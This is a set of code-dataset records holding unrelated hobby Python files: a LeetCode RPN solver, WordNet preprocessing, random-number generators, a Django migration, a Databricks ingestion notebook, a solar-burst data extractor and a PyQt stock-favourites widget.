tokens: list[str]) -> int:\n # add tokens to stack\n # when you find an operand, pop last two, apply, and return result to stack.\n stack = []\n for token in tokens:\n if token in (\"+\", \"-\", \"*\", \"/\"):\n num1 = stack.pop()\n num2 = stack.pop()\n stack.append(int(eval(f\"{num2} {token} {num1}\")))\n else:\n stack.append(int(token))\n return stack[0]\n \n# @lc code=end\nprint(Solution().evalRPN([\"4\"]))\n","repo_name":"felivalencia3/Leetcode","sub_path":"150.evaluate-reverse-polish-notation.py","file_name":"150.evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4488303827","text":"from nltk.corpus import wordnet as wn\nimport itertools\n\ndef get_wordnet_dataset():\n word_info1 = []\n word_info2 = []\n word_info3 = []\n sentence1 = []\n sentence2 = []\n sentence3 = []\n\n #第一种生成正样本策略\n for word in wn.all_lemma_names():\n for synset in wn.synsets(word):\n if word != synset.lemma_names()[0]: #sense 以当前word开头\n continue\n if(len(synset.examples())) > 2:\n global no_repetitions\n no_repetitions = []\n pos_sense_examples = list(itertools.combinations(synset.examples(), r = 2))\n sentence1.append(pos_sense_examples[0])\n sentence2.append(pos_sense_examples[1])\n word_info1.append(synset._name)\n word_info2.append(synset._name)\n \n\n print(1)\n\n\n\ndef test(word):\n syns = wn.synsets(word)\n print(syns[0].name())\n print(syns[0].lemmas()[0].name())\n\nif __name__ == \"__main__\":\n get_wordnet_dataset()\n # test(\"program\")","repo_name":"Jhin3433/Event_SimCSE","sub_path":"event/discard/Wordnet_processing.py","file_name":"Wordnet_processing.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35841437353","text":"import math\n\nimport numpy as np\n\nfrom main import open_file\n\ne_numbers = np.array(list(open_file()))\n\n\nclass Generator1:\n\n def __init__(self, seed=0, nb_digits=10):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.nb_digits = nb_digits\n\n def random(self):\n digits = []\n for i in range(self.nb_digits):\n digit = e_numbers[self.index]\n digits.append(digit)\n self.index = (self.index + 1) % len(e_numbers)\n return float(\"0.\" + \"\".join(map(lambda x: str(x), digits)))\n\n\nclass Generator2:\n\n def __init__(self, seed=0, nb_digits=10):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.nb_digits = nb_digits\n\n def random(self):\n xyz = []\n for j in range(3):\n digits = []\n for k in range(self.nb_digits):\n digit = e_numbers[self.index]\n digits.append(digit)\n self.index = (self.index + 1) % len(e_numbers)\n xyz.append(float(\"0.\" + \"\".join(map(lambda x: str(x), digits))))\n return math.sqrt(sum([x ** 2 for x in xyz])) / math.sqrt(3)\n\n\nclass Generator3:\n\n def __init__(self, seed=0, precision=53):\n self.seed = seed\n self.index = seed % len(e_numbers)\n self.precision = precision # IEE754 double has 53 bits of precision\n\n def random(self):\n bits = 0\n generated = 0\n while bits < self.precision:\n rn = e_numbers[self.index]\n\n if rn > 7:\n self.index = (self.index + 1) % len(e_numbers)\n continue\n\n three_bits = (\n rn & 1,\n (rn & 2) // 2,\n (rn & 4) // 4\n )\n\n for i in range(3):\n if bits >= self.precision:\n break\n generated = (generated << 1) | three_bits[i]\n bits += 1\n\n self.index = (self.index + 1) % len(e_numbers)\n return generated / 2 ** self.precision\n","repo_name":"laurencefloriani/simulation","sub_path":"generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31200600937","text":"import unittest\nfrom L19.test_L17.classes.employee_recruiter_developer import Recruiter\n\n\nclass TestRecruiter(unittest.TestCase):\n def test_str(self):\n rec = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n self.assertEqual(\"Recruiter: Valeriya Belyayeva, Salary: 0\", f\"Recruiter: {rec.name}, Salary: {rec.check_salary()}\")\n\n def test_compare(self):\n rec1 = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n rec2 = Recruiter('Brittney Skil', 20, 'brittney36@ccategoryk.com')\n rec3 = Recruiter('Brittney Well', 30, 'brittney36@ccategoryk.com')\n self.assertTrue(rec1 == rec2)\n self.assertFalse(rec1 > rec2)\n self.assertTrue(rec3 > rec2)\n\n def test_work(self):\n rec1 = Recruiter('Valeriya Belyayeva', 20, '848belval848@gmail.com')\n self.assertEqual('I come to the office and start to hiring.', rec1.work())","repo_name":"belva1/htasks_module3","sub_path":"L19/test_L17/tests/test_recruiter.py","file_name":"test_recruiter.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69820904785","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport bitfield.models\nimport dirtyfields.dirtyfields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageLink',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('chat_id', models.BigIntegerField()),\n ('original_message_id', models.BigIntegerField()),\n ('new_chat_id', models.BigIntegerField(db_index=True)),\n ('new_message_id', models.BigIntegerField(db_index=True)),\n ('extra', models.CharField(max_length=255, default='')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='TgChat',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('tg_id', models.BigIntegerField(unique=True)),\n ('active', models.BooleanField(default=True, verbose_name='Активен?')),\n ('type', models.CharField(max_length=10)),\n ('title', models.CharField(max_length=255)),\n ],\n options={\n 'verbose_name_plural': '4. TgChat',\n 'verbose_name': 'TgChat',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='TgMessage',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('tg_id', models.BigIntegerField(default=0, db_index=True)),\n ('from_tg_id', models.BigIntegerField(default=0)),\n ('message_id', models.BigIntegerField()),\n ('chat_type', models.CharField(max_length=100)),\n ('requests_made', models.IntegerField(default=0)),\n ('fnc', models.CharField(max_length=80, default='', db_index=True)),\n ('result', models.CharField(max_length=100, default='', db_index=True)),\n ('text', models.TextField()),\n ('message', models.TextField()),\n ('date', models.DateTimeField()),\n ('created_at', models.DateTimeField(db_index=True, auto_now_add=True)),\n ('tgchat', models.ForeignKey(to='bot.TgChat', on_delete=django.db.models.deletion.SET_NULL, null=True)),\n ],\n options={\n 'verbose_name_plural': '2. TgMessage',\n 'verbose_name': 'TgMessage',\n },\n ),\n migrations.CreateModel(\n name='TgUser',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('tg_id', models.BigIntegerField(unique=True)),\n ('active', models.BooleanField(default=True, verbose_name='Активен?')),\n ('username', models.CharField(max_length=255, blank=True)),\n ('first_name', models.CharField(max_length=255)),\n ('last_name', models.CharField(max_length=255, default='', blank=True)),\n ('last_active_at', models.DateTimeField(blank=True, null=True)),\n ('dialog', models.CharField(max_length=255, default='', editable=False, blank=True)),\n ('flags', bitfield.models.BitField((), blank=True, default=None)),\n ],\n options={\n 'verbose_name_plural': '1. TgUser',\n 'verbose_name': 'TgUser',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='Trello',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('token', models.CharField(max_length=100)),\n ('token_created_at', models.DateTimeField()),\n ('tguser', models.OneToOneField(verbose_name='TgUser', to='bot.TgUser')),\n ],\n ),\n migrations.AddField(\n model_name='tgmessage',\n name='tguser',\n field=models.ForeignKey(to='bot.TgUser', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"ihoru/trelloplusbot","sub_path":"bot/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21004164011","text":"import os\nimport numpy as np \nfrom tqdm import tqdm\nimport cv2\nimport pypokedex as dex\nimport random\nimport sys\nsys.path.insert(0,'..')\nimport utils\n\nclass data_manager:\n \"\"\"\n Class to manage the pokemon images and additional data.\n\n only works with pokemon up to dex number 807 until pypokedex is updated.\n simply remove the if statement in the __init__ function if it gets updated!\n\n this data pipeline is intended for tensorflow + keras\n \"\"\"\n def __init__(self, path=os.path.join(\"..\", \"clean_pkm\")):\n \"\"\"\n init loads all pokemon images and data.\n it creates a list with images and a list with data/labels\n \"\"\"\n if not os.path.isdir(path):\n raise NotADirectoryError\n \n self.images = []\n self.pkm = []\n\n for f_name in tqdm(os.listdir(path)):\n if os.path.isdir(os.path.join(path, f_name)):\n continue\n dex_number = int(f_name.split(\".\")[0].split(\"_\")[0].split(\"-\")[0])\n\n # remove this in the case of a pypokedex update\n if dex_number <= 807:\n self.images.append(cv2.cvtColor(cv2.imread(os.path.join(path, f_name)), cv2.COLOR_BGR2RGB))\n self.pkm.append(dex.get(dex=dex_number))\n\n def shuffle(self):\n z = list(zip(self.images, self.pkm))\n random.shuffle(z)\n self.images, self.pkm = zip(*z)\n\n\n\n\n\nif __name__ == \"__main__\":\n data = data_manager()\n data.shuffle()\n\n imgs = data.images[0:20]\n lbls = [p.name for p in data.pkm[0:20]]\n\n utils.plot_images(imgs, lbls=lbls)\n","repo_name":"Niklas-Penzel/PokeGAN","sub_path":"data_pipeline/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17828578655","text":"import os\nfrom os.path import join as opj\nimport random\nimport numpy as np\n\nfrom PIL import Image\nimport torchvision.transforms as T\nfrom torch.utils.data import Dataset\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG', '.pgm', '.PGM',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP', '.tiff', \n '.txt', '.json'\n]\n\nclass BaseDataset(Dataset):\n def __init__(self, args):\n super().__init__()\n self.args = args\n def name(self):\n return \"BaseDataset\"\ndef is_image_file(f):\n return any(f.endswith(extension) for extension in IMG_EXTENSIONS)\ndef make_grouped_dataset(dir):\n images = []\n fnames = sorted(os.walk(dir))\n for fname in sorted(fnames):\n paths = []\n root = fname[0]\n for f in sorted(fname[2]):\n if is_image_file(f):\n paths.append(opj(root, f))\n if len(paths) > 0:\n images.append(paths)\n return images\ndef _scale_width(img, target_width, method=Image.BICUBIC):\n ow, oh = img.size\n if ow == target_width:\n return img\n w = target_width\n h = int(target_width * oh / ow)\n return img.resize((w, h), method)\ndef _crop(img, pos, size):\n ow, oh = img.size\n x1, y1 = pos\n tw = th = size\n if ow > tw or oh > th:\n return img.crop((x1, y1, x1+tw, y1+th))\n return img\ndef _make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n return img.resize((w, h), method)\ndef _flip(img, flip):\n if flip:\n return img.transpose(Image.FLIP_LEFT_RIGHT)\n return img\ndef get_img_params():\n flip = random.random() > 0.5\n return {\"flip\": flip}\ndef get_transforms(args, params, is_train=True):\n T_lst = []\n T_lst.append(T.Resize((args.img_size, args.img_size), interpolation=Image.BICUBIC))\n if is_train and args.use_flip:\n T_lst.append(T.Lambda(lambda img: _flip(img, params[\"flip\"])))\n T_lst.append(T.ToTensor())\n if args.input_ch == 1:\n T_lst.append(T.Normalize((0.5), (0.5)))\n elif args.input_ch == 3:\n T_lst.append(T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)))\n return T.Compose(T_lst)\ndef get_video_params(args, n_frames_total, cur_seq_len, idx, is_train):\n tG = args.n_frames_G\n if is_train:\n n_frames_total = min(n_frames_total, cur_seq_len - tG + 1)\n n_frames_total = n_frames_total + tG - 1\n max_t_step = min(args.max_t_step, (cur_seq_len-1)//(n_frames_total-1))\n t_step = np.random.randint(max_t_step)+1\n offset_max = max(1, cur_seq_len - (n_frames_total-1)*t_step)\n start_idx = np.random.randint(offset_max)\n else:\n n_frames_total = tG\n start_idx = idx\n t_step = 1\n return n_frames_total, start_idx, t_step\n\n\n\n\n\n\n ","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/Vid2Vid/datasets/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72784748305","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 7 17:16:42 2022\n\n@author: mas1a\n\"\"\"\n\nimport os\nimport pandas as pd\n\ncontenido = os.listdir('../Data/NOAAtxt')\n\ndef main():\n for i in range(0, len(contenido), 1):\n ###Variables\n starthour = []\n startmin = []\n endhour = []\n endmin = []\n duration = []\n seconds = []\n frecstart = []\n frecend = []\n intensity = []\n arrayobs = []\n ###Parametros\n frec = []\n quarterstart = []\n quarterend = []\n partduration = []\n relevance = []\n \n ###Leer ficheros\n txt = read_txt(i)\n fichero = open(txt)\n lineas = fichero.readlines()\n for linea in range(0, len(lineas), 1):\n if linea == 2:\n line = lineas[2]\n day = line[15:17]\n day = int(day) #dia\n month = line[12:14]\n month = int(month) #mes\n year = line[7:11]\n year = int(year) #año\n if linea > 11 and len(lineas[linea]) == 81:\n line = lineas[linea]\n typ = line[43:46] #tipo RSP\n obs = line[34:37] #observatorio\n if typ == 'RSP':\n if obs == 'SVI' or obs == 'CUL' or obs == 'LEA':\n arrayobs.append(obs)\n starth = line[11:13]\n starth = int(starth)\n starthour.append(starth)\n startm = line[13:15]\n startm = int(startm)\n startmin.append(startm)\n endh = line[28:30]\n endh = int(endh)\n endhour.append(endh)\n endm = line[30:32]\n endm = int(endm)\n endmin.append(endm)\n fstart = line[48:51]\n fstart = int(fstart)\n frecstart.append(fstart)\n fend = line[52:55]\n fend = int(fend)\n frecend.append(fend)\n dur = (endh - starth)*60 + (endm - startm) + 1\n duration.append(dur)\n inten = line[58:63]\n intensity.append(inten)\n #Parametros\n for v in range(0, len(duration), 1):\n if duration[v] <= 1:\n partduration.append('1P')\n if duration[v] > 1:\n partduration.append('4P')\n \n for k in range(0, len(startmin), 1):\n if startmin[k] < 15:\n quarterstart.append('1Q')\n if startmin[k] >= 15 and startmin[k] < 30:\n quarterstart.append('2Q')\n if startmin[k] >= 30 and startmin[k] < 45:\n quarterstart.append('3Q')\n if startmin[k] >= 45:\n quarterstart.append('4Q')\n \n for l in range(0, len(endmin), 1):\n if endmin[l] < 15:\n quarterend.append('1Q')\n if endmin[l] >= 15 and endmin[l] < 30:\n quarterend.append('2Q')\n if endmin[l] >= 30 and endmin[l] < 45:\n quarterend.append('3Q')\n if endmin[l] >= 45:\n quarterend.append('4Q')\n \n for n in range(0, len(frecend), 1):\n if frecend[n] < 100:\n frec.append('90-15 MHz')\n if frecend[n] >= 100 and frecend[n] < 200:\n frec.append('180-45 MHz')\n if frecend[n] >= 200:\n frec.append('525-110 MHz')\n \n for t in range(0, len(intensity), 1):\n for p in range(0, len(intensity[t]), 1):\n if intensity[t][p] == '1':\n relevance.append('1')\n if intensity[t][p] == '2':\n relevance.append('2')\n if intensity[t][p] == '3':\n relevance.append('3')\n \n for sec in duration:\n seconds.append(sec*60)\n \n \n #Enviar a Excel\n df = pd.read_excel(r'../Data/BurstData.xlsx')\n for m in range(0, len(starthour), 1):\n df = df.append({'From': 'NOAA',\n 'Station': arrayobs[m],\n 'Year': year,\n 'Month': month,\n 'Day': day,\n 'Freq Max (MHz)': frecend[m],\n 'Freq Min (MHz)': frecstart[m],\n 'Freq': frec[m],\n 'Hour Start': starthour[m],\n 'Min Start': startmin[m],\n 'Quarter Start': quarterstart[m],\n 'Duration (min)': duration[m],\n 'Duration (s)': seconds[m],\n 'Part Duration': partduration[m],\n 'Image Start': '-',\n 'Intensity (dB)': '-',\n 'Relevance': relevance[m]}, ignore_index=True)\n df.to_excel(r'../Data/BurstData.xlsx', index=False)\n \n \n \n \ndef read_txt(i):\n \n path = '../Data/NOAAtxt'\n filename = contenido[i]\n \n files = os.path.join(path, filename)\n return files\n\n \nif __name__ == \"__main__\":\n main()\n print(\"Proceso finalizado.\")\n \n","repo_name":"AlvaroMasG/AutomatedAnalysisCallisto","sub_path":"Data_extraction/extractNOAA.py","file_name":"extractNOAA.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25386556130","text":"import turtle\nt = turtle.Pen ()\nturtle.bgcolor (\"black\")\ncolors = [\"red\", \"yellow\", \"blue\", \"green\", \"purple\",\n \"white\", \"pink\", \"gray\", \"orange\", \"brown\"]\nfamily = []\nname = turtle.textinput('Моя семья',\n 'Введите любое имя или \"Стоп\", чтобы выйти:')\nwhile name!= \"Стоп\":\n family.append(name)\n name = turtle.textinput('Моя семья', 'Введите ещё одно имя или \"Стоп\", чтобы выйти:')\nfor x in range (100):\n t.pencolor(colors[x%len(family)])\n t.penup()\n t.forward(x*4)\n t.pendown()\n t.write(family[x%len(family)], font=(\"Arial\",\n int((x+4)/4), \"bold\"))\n t.left(360/len(family)+2)","repo_name":"Layren18/B.Payne-TeachYourKidsCode","sub_path":"4 глава/Spiral with names.py","file_name":"Spiral with names.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71862852626","text":"\nimport mimetypes\nimport os.path\nfrom pyramid.response import FileResponse\nfrom pyramid.request import Request\nHERE = os.path.dirname(os.path.abspath(__file__))\n\n\nclass FrontendFilter(object):\n def __init__(self, app, global_conf, document_root):\n self.app = app\n if ':' in document_root:\n document_root = os.path.join(HERE, document_root.split(':', 1)[1])\n self.document_root = document_root\n\n def __call__(self, environ, start_response):\n path = environ.get('PATH_INFO').strip('/') or 'index.html'\n filename = os.path.join(self.document_root, path)\n if os.path.isfile(filename):\n file_type, _ = mimetypes.guess_type(filename)\n response = FileResponse(\n filename,\n request=Request(environ=environ),\n content_type=file_type,\n )\n return response(environ, start_response)\n return self.app(environ, start_response)\n","repo_name":"enkidulan/blog_frontend","sub_path":"blog_frontend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4889764882","text":"# Databricks notebook source\n# MAGIC %run ../includes/configuration\n\n# COMMAND ----------\n\n# MAGIC %run ../includes/common_functions\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Read file using Spark DataFrame API\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DateType\n\n# COMMAND ----------\n\nname_schema = StructType([StructField('forename', StringType(), nullable=False),\\\n StructField('surname', StringType(), nullable=False)])\n\n# COMMAND ----------\n\ndriver_schema = StructType([StructField('driverId', IntegerType(), nullable=False),\\\n StructField('driverRef', IntegerType(), nullable=False),\\\n StructField('number', IntegerType(), nullable=True),\\\n StructField('code', IntegerType(), nullable=True),\\\n StructField('name', name_schema),\\\n StructField('dob', DateType(), nullable=True),\\\n StructField('nationality', StringType(), nullable=True),\\\n StructField('url', StringType(), nullable=False)])\n\n# COMMAND ----------\n\ndrivers_df = spark.read \\\n .schema(driver_schema) \\\n .json(f'{raw_folder_path}/drivers.json')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Rename & add new columns\n# MAGIC 1. rename driverId & driverRef\n# MAGIC 2. add ingestion date\n# MAGIC 3. concat fore and surname\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import concat, lit, col\n\nalmost_transformed_drivers_df = drivers_df.withColumnRenamed('driverId', 'driver_id') \\\n .withColumnRenamed('driverRef', 'driver_ref') \\\n .withColumn('name',concat(col('name.forename'), lit(' '), col('name.surname')))\n\n# COMMAND ----------\n\ntransformed_drivers_df = add_ingestion_date(almost_transformed_drivers_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Drop unwanted columns\n\n# COMMAND ----------\n\nfinal_drivers_df = transformed_drivers_df.drop('url')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Write to parquet\n\n# COMMAND ----------\n\nfinal_drivers_df.write \\\n .mode('overwrite') \\\n .parquet(f'{processed_folder_path}/drivers')\n","repo_name":"M1sterDonut/Azure-Databricks-Spark-Core-For-Data-Engineers-Python-SQL-","sub_path":"formula1/ingestion/4.ingest_drivers_file.py","file_name":"4.ingest_drivers_file.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36960313333","text":"import logging\n# from datetime import datetime\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QModelIndex\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QMenu, QInputDialog\nfrom PyQt5.QtWidgets import QLineEdit\n\nfrom stockmonitor.gui.dataobject import DataObject, READONLY_FAV_GROUPS\nfrom stockmonitor.gui.widget.stocktable import wallet_background_color, insert_new_action,\\\n marker_background_color\n\nfrom stockdataaccess.dataaccess.datatype import StockDataType\nfrom stockdataaccess.dataaccess.gpw.gpwcurrentdata import GpwCurrentStockData\n\nfrom .stocktable import StockTable, TableRowColorDelegate\n\nfrom .. import uiloader\n\n\nUiTargetClass, QtBaseClass = uiloader.load_ui_from_class_name( __file__ )\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass StockFavsColorDelegate( TableRowColorDelegate ):\n\n def __init__(self, dataObject: DataObject):\n super().__init__()\n self.dataObject = dataObject\n\n ## override\n def foreground(self, index: QModelIndex ):\n dataChangeIndex = GpwCurrentStockData.getColumnIndex( StockDataType.CHANGE_TO_REF )\n dataColumn = index.column()\n ## \"Zm.do k.odn.[%]\"\n if dataColumn == dataChangeIndex:\n stockChangeString = index.data()\n if stockChangeString != \"-\":\n stockChange = float(stockChangeString)\n if stockChange > 0.0:\n return QtGui.QColor( \"green\" )\n # return QtGui.QColor( \"red\" )\n return None\n\n ## override\n def background(self, index: QModelIndex ):\n sourceParent = index.parent()\n dataRow = index.row()\n dataIndex = self.parent.index( dataRow, 3, sourceParent ) ## get ticker\n ticker = dataIndex.data()\n markerColor = marker_background_color( self.dataObject, ticker )\n if markerColor is not None:\n return markerColor\n return wallet_background_color( self.dataObject, ticker )\n\n\nclass StockFavsTable( StockTable ):\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n self.setObjectName(\"stockfavstable\")\n self.setShowGrid( True )\n self.setAlternatingRowColors( False )\n self.dataObject = None\n self.favGroup = None\n\n # pylint: disable=W0221\n def connectData(self, dataObject, favGroup):\n self.dataObject = dataObject\n self.favGroup = favGroup\n if self.dataObject is None:\n return\n\n colorDecorator = StockFavsColorDelegate( self.dataObject )\n self.setColorDelegate( colorDecorator )\n\n self.dataObject.stockDataChanged.connect( self.updateData )\n self.dataObject.stockHeadersChanged.connect( self.updateView )\n self.updateData()\n self.updateView()\n\n def updateData(self):\n dataframe = self.dataObject.getFavStock( self.favGroup )\n self.setData( dataframe )\n\n def updateView(self):\n self.setHeadersText( self.dataObject.gpwCurrentHeaders )\n\n ## override\n def createContextMenu(self, itemIndex):\n contextMenu = super().createContextMenu( itemIndex )\n if self.favGroup not in READONLY_FAV_GROUPS:\n if self.dataObject is not None:\n remFavAction = insert_new_action(contextMenu, \"Remove fav\", 3)\n remFavAction.triggered.connect( self._removeFav )\n# insert_new_action(contextMenu, \"\", 1)\n return contextMenu\n\n def _removeFav(self):\n favList = self._getSelectedTickers()\n self.dataObject.deleteFav( self.favGroup, favList )\n\n def _getSelectedTickers(self):\n dataIndex = GpwCurrentStockData.getColumnIndex( StockDataType.TICKER )\n return self.getSelectedData( dataIndex ) ## ticker\n\n def settingsAccepted(self):\n self.dataObject.gpwCurrentHeaders = self.pandaModel.customHeader\n\n def settingsRejected(self):\n self.dataObject.gpwCurrentHeaders = self.pandaModel.customHeader\n\n\n## ====================================================================\n\n\nclass SinglePageWidget( QWidget ):\n\n contentChanged = pyqtSignal()\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n\n self.content = \"\"\n self.changeCounter = 0\n\n vlayout = QVBoxLayout()\n vlayout.setContentsMargins( 6, 6, 6, 6 )\n self.setLayout( vlayout )\n self.stockData = StockFavsTable(self)\n\n vlayout.addWidget( self.stockData )\n\n def setData(self, dataObject, favGroup):\n self.setObjectName( favGroup )\n self.stockData.connectData( dataObject, favGroup )\n\n def updateView(self):\n self.stockData.updateData()\n\n def loadSettings(self, settings):\n self.stockData.loadSettings( settings )\n\n def saveSettings(self, settings):\n self.stockData.saveSettings( settings )\n\n\nclass FavsWidget( QtBaseClass ): # type: ignore\n\n addFavGrp = pyqtSignal( str )\n renameFavGrp = pyqtSignal( str, str )\n removeFavGrp = pyqtSignal( str )\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n self.ui = UiTargetClass()\n self.ui.setupUi(self)\n\n self.dataObject = None\n\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.tabMoved.connect( self.tabMoved )\n\n self.ui.data_tabs.clear()\n\n def connectData(self, dataObject):\n self.dataObject = dataObject\n self.dataObject.favsGrpChanged.connect( self.updateTab )\n self.dataObject.favsReordered.connect( self.updateOrder )\n self.dataObject.favsRenamed.connect( self._renameTab )\n self.dataObject.favsChanged.connect( self.updateView )\n self.updateView()\n\n def updateView(self):\n if self.dataObject is None:\n _LOGGER.warning(\"unable to update view\")\n self.ui.data_tabs.clear()\n return\n favsObj = self.dataObject.favs\n favKeys = favsObj.getFavGroups()\n\n _LOGGER.info(\"updating view: %s %s\", favKeys, self.tabsList() )\n\n tabsNum = self.ui.data_tabs.count()\n\n for i in reversed( range(tabsNum) ):\n tabName = self.tabText( i )\n if tabName not in favKeys:\n _LOGGER.info(\"removing tab: %s %s\", i, tabName)\n self.removeTab( i )\n\n i = -1\n for favName in favKeys:\n i += 1\n tabIndex = self.findTabIndex( favName )\n if tabIndex < 0:\n _LOGGER.debug(\"adding tab: %s\", favName)\n self.addTab( favName )\n\n self.updateOrder()\n\n def updateTab(self, tabName):\n _LOGGER.info(\"updating tab: %s\", tabName)\n tabIndex = self.findTabIndex( tabName )\n pageWidget: SinglePageWidget = self.ui.data_tabs.widget( tabIndex )\n if pageWidget is not None:\n pageWidget.updateView()\n\n def updateOrder(self):\n if self.dataObject is None:\n _LOGGER.warning(\"unable to reorder view\")\n return\n favsObj = self.dataObject.favs\n _LOGGER.info(\"updating order\")\n favKeys = favsObj.getFavGroups()\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.tabMoved.disconnect( self.tabMoved )\n i = -1\n for key in favKeys:\n i += 1\n tabIndex = self.findTabIndex( key )\n if tabIndex < 0:\n continue\n if tabIndex != i:\n _LOGGER.warning(\"moving tab %s from %s to %s\", key, tabIndex, i)\n tabBar.moveTab( tabIndex, i )\n tabBar.tabMoved.connect( self.tabMoved )\n\n def addTab(self, favGroup):\n pageWidget = SinglePageWidget(self)\n pageWidget.setData( self.dataObject, favGroup )\n self.ui.data_tabs.addTab( pageWidget, favGroup )\n\n def removeTab(self, tabIndex):\n widget = self.ui.data_tabs.widget( tabIndex )\n widget.setParent( None )\n del widget\n\n def loadSettings(self, settings):\n tabsSize = self.ui.data_tabs.count()\n for tabIndex in range(0, tabsSize):\n pageWidget = self.ui.data_tabs.widget( tabIndex )\n pageWidget.loadSettings( settings )\n\n def saveSettings(self, settings):\n tabsSize = self.ui.data_tabs.count()\n for tabIndex in range(0, tabsSize):\n pageWidget = self.ui.data_tabs.widget( tabIndex )\n pageWidget.saveSettings( settings )\n\n def findTabIndex(self, tabName):\n for ind in range(0, self.ui.data_tabs.count()):\n tabText = self.tabText( ind )\n if tabText == tabName:\n return ind\n return -1\n\n def tabsList(self):\n ret = []\n for ind in range(0, self.ui.data_tabs.count()):\n tabText = self.tabText( ind )\n ret.append( tabText )\n return ret\n\n def contextMenuEvent( self, event ):\n evPos = event.pos()\n globalPos = self.mapToGlobal( evPos )\n tabBar = self.ui.data_tabs.tabBar()\n tabPos = tabBar.mapFromGlobal( globalPos )\n tabIndex = tabBar.tabAt( tabPos )\n\n favGroup = tabBar.tabText( tabIndex )\n if favGroup in READONLY_FAV_GROUPS:\n return\n\n contextMenu = QMenu(self)\n newAction = contextMenu.addAction(\"New\")\n renameAction = contextMenu.addAction(\"Rename\")\n deleteAction = contextMenu.addAction(\"Delete\")\n\n if tabIndex < 0:\n renameAction.setEnabled( False )\n deleteAction.setEnabled( False )\n\n action = contextMenu.exec_( globalPos )\n\n if action == newAction:\n self._newTabRequest()\n elif action == renameAction:\n self._renameTabRequest( tabIndex )\n elif action == deleteAction:\n ticker = self.tabText( tabIndex )\n self.removeFavGrp.emit( ticker )\n\n def tabMoved(self):\n favOrder = self.tabsList()\n self.dataObject.reorderFavGroups( favOrder )\n\n 